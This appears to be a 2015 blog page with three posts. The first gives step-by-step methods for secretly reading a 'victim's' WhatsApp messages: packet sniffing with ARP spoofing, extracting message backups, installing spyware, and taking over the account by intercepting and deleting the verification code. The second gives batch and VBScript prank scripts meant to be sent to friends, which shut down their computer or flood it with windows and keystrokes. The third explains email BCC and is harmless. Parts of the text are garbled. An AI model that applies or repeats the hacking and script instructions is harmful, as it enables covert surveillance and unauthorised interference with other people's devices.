Monday, 18 May 2015

HOW TO HACK YOUR FRIEND'S WHATSAPP ACCOUNT

https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTx3pw3x6kUEfDrQF0qPHEGRize-3_xfWrkgfcOjFH-8irVE8vKsQImage result for whatsapp for pc


It’s a very grossing topic which led me to Spend around 10 

days in studying it. While searching for WhatsApp Hacking 

on Internet I have gone through many Websites & Videos 

and the only thing I got that they all were containing Fake 

Apps & Tools. I went on a deeper research and  finally I got 

to know about three Methods of Accessing WhatsApp 

account which are mentioned below.


1. WhatsApp Sniffer

WhatsAppSniffer is a tool for root terminals to read 
WhatsApp conversations of a WIFI Network (Open, WEP, 
WPA/WPA2). It captures the Conversations, Pictures / 
Videos and coordinates that are sent or received by an 
Android phone, iPhone or Nokia on the same WIFI Network. 
It has not been tested with Windows Phone Terminalsa and 
also It can’t read the messages written or received by the 
BlackBerry’s, as they use their own servers.
This application is designed to demonstrate that the security 
of WhatsApp’s communications is null. WhatsApp Sniffer 
just use the TCPDump program which reads all the WIFI 
network packets and filters those which has origin or 
destination WhatsApp’s servers. All messages are in plain 
text, so it does not decrypt anything, complying fully with 
the legal terms of WhatsApp.

“While we do not disallow the use of sniffers Such as Ethereal, TCPDump or HttpWatch in general, Any we do going efforts to disallow reverse-engineer our system, our protocols, or explore outside the boundaries of the ordinary requests made by clients WhatsApp” 
For WPA/WPA2 encrypted networks, if uses the tool ARPSpoof (optional).

Requirements

  • A Rooted Android Device.
  • Your Victim Should Use Same Wi-Fi Through Which you are connected.
  • WhatsAppSniffer Donate ★ root v1.03. Click here to download.

2. Decrypting Conversations

Have your victim locked his WhatsApp app? You can still 

read his conversation on your PC. Generally for security 

reasons WhatsApp encrypt Conversation while taking 

backup in SD Card or Phone Memory. But i have found a 

tool on XDA that claims to decrypt all the WhatsApp 

conversation down to your PC. If you have some access 

over his device you can also send files from Bluetooth to 

your device and later read all the conversations. This tool is 


Some general advice on how to backup 

WhatsApp and get the database file:

Android

- In Whatsapp go to settings – more – Backup Chats
- Copy the folder “Whatsapp” on the SD card to your backup location (e.g., PC)
- (Ideally Also) Use the app Titanium Backup to backup the full WhatsApp application together with its data, copy the backup from the folder “TitaniumBackup” on the SD card to your backup location (e.g., PC)
- Use this tool Whatsapp Backup Extractor (download in this thread) to show the chats in a friendly readable format. The necessary files “wa.db” and “msgstore.db” you will find inside the Titanium Backup archive “com.whatsapp-[Date]-[some digits].tar.gz”, alternatively (without Titanium Backup) you can use the msgstore.db.crypt file from the folder Whatsapp/Databases on the SD card.

iPhone

- Use Itunes to create an unencrypted Backup
- Use an Iphone Backup Tool to get the file net.whatsapp.WhatsApp/Documents/ChatStorage.sqlite, e.g. I-Twin or Iphone Backup Extractor. Make sure to create an unencrypted backup with Itunes, as these tools can’t handle encrypted backups. Another possibility are forensic tools like UFED Physical Analyzer.)

Blackberry

- Sync your blackberry with desktop manager and then copy the messagestore.db file from SD
- However, it seems that this file is encrypted? Currently I don’t know how to get the unencrypted messagestore.db file
- Hence, Blackberry not supported yet!

Nokia

- Not known yet
- Nokia not supported yet!
For Further Detail about this Method you can move to this Forum of XDA.

3. Using Spywares

Using 3rd Party Spywares can be very useful for spying not only WhatsApp Conversation but also many things like, you can able to Track GPS Location, you can capture the lock screen passwords and they can be also used for monitoring Websites.


A Simple Method

It’s a very simple method but in this process you must 

access over target person Mobile for 5 seconds only.  Just 

follow the steps simply.


  1. Whoever your target is, if you want to access their 

  2. account, you’ll need their phone to set the process up. 

  3. After setup, you’ll be able to read their messages in 

  4. future.Download WhatsApp on your mobile, or if you 

  5. want to do the hacking on computer, download Bluestack 
  1. and through it, download WhatsApp for your computer.

  2. WhatsApp will send confirmation message to target’s 

  3. mobile with a confirmation code.

  4. Enter that code into your computers’s WhatsApp.

  5. Delete the confirmation message from the target’s phone.


  6. BINGO!!! Now you have access to all the chats of the 

  7. target. You can read all chats and also reply to them 

  8. without the target knowing it.

Virus writing code..

Image result for virus computerImage result for virus computer

friends want to play with your friends computer..?

if yes then start reading this post.

In this article i came with new pranks (or) tricks (or) similar to virus creating ..
ya it's acts like a virus but not virus it's a simple programme.

Materials: NOTEPAD

By using only notepad you can create your own virus don't worry it doesn't effect your PC.

Ok the below are the codes of Virus like acting.

* Convey your friend a lil' message and shut down his / her computer:

Type in notepad:

@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s


Save it as "Anything.BAT" in All Files and send it.


* Open Notepad continually in your friend's computer:

Type :

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top


Save it as "Anything.BAT" and send it.


* Toggle your friend's Caps Lock button simultaneously:

Type :

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop

Save it as "Anything.VBS" and send it.


* Frustrate your friend by making this VBScript hit Enter simultaneously:

Type :

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop

Save it as "Anything.VBS" and send it.


* Frustrate your friend by making this VBScript hit Backspace simultaneously:

Type :

MsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop

Save it as "Anything.VBS" and send it.

* Ok this is my favorite , this script hacks your friend's keyboard and make him type "You are a fool" simultaneously , u can change " you are a fool" to any anything u want .

Type :

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "You are a fool."
loop

Save it as "Anything.VBS" and send it.


All this works until system will restart so don't worry
.

Benefits of Using BCC While Sending an Email

Image result for BCCImage result for BCC

Almost every user on the Internet sends and receives hundreds of emails on a regular basis. However, only a handful of them know what is BCC and what are the advantages of using BCC while sending an email.
If you are one such Internet user who is unaware of what BCC is all about, then this is the post that you should definitely read!

What is BCC?

BCC stands Blind Carbon Copy. It refers to the practice of sending an email to multiple recipients without disclosing the individual emails addresses.
While sending the same email/message to multiple recipients, it is a common practice for most users to separate the email addresses by using comma or semi-colon and insert all those recipient addresses in the To: filed. When emails are sent in this way, each receiver is able to see the complete list of all the recipient email addresses to which the same message if being sent to.
Unlike the To: field, the BCC: option on the other hand allows you to hide the recipients in email messages. In other words, when emails are sent using BCC:,  the receiver will not be able to see the list of recipient email addresses. Thus, using BCC is a smart way to protect the privacy of the recipients.

Why should you use BCC?

Here are the reasons for using the BCC option:
Risk of Spammers: In order to avoid the risk of spammers, it is necessary that you encourage people/friends to use BCC: while forwarding any message to you. This prevents your email address from appearing in other person’s inbox thereby keeping yourself less exposed to spammers. You may also refer How to Protect an Email Account from SPAM
 for more information on spamming.
While forwarding email messages, people often do not bother to remove the list of previous recipients.  As a result, messages that are repeatedly sent to many recipients may contain a long lists of email addresses. This makes it easy for the spammers to collect and target those email IDs for spamming.
Protect the Privacy: BCC provides an easy and simple option for protecting the privacy of your recipients. Under many circumstances it is necessary for us to send an email without letting the recipients know who else is receiving the same message. Also, it is highly recommended that you use the BCC: option while forwarding a joke or a funny email to a list of your friends. If you are sending email on behalf of a business or organization, it may be especially important to keep the list of clients, members, or associates confidential. So, don’t forget to use BCC: option in those instances wherever privacy matters.

How to BCC an email message?

Most email clients provide the BCC: option under a few lines below the To: field. All you have to do is just enter the list of recipients in the BCC: field instead of entering the same in the To: field. You may leave the To: field blank or enter your own email address. Once you do this, just hit the Send button.
The moral is that you should use BCC: while sending bulk messages so as to protect the privacy of your recipients.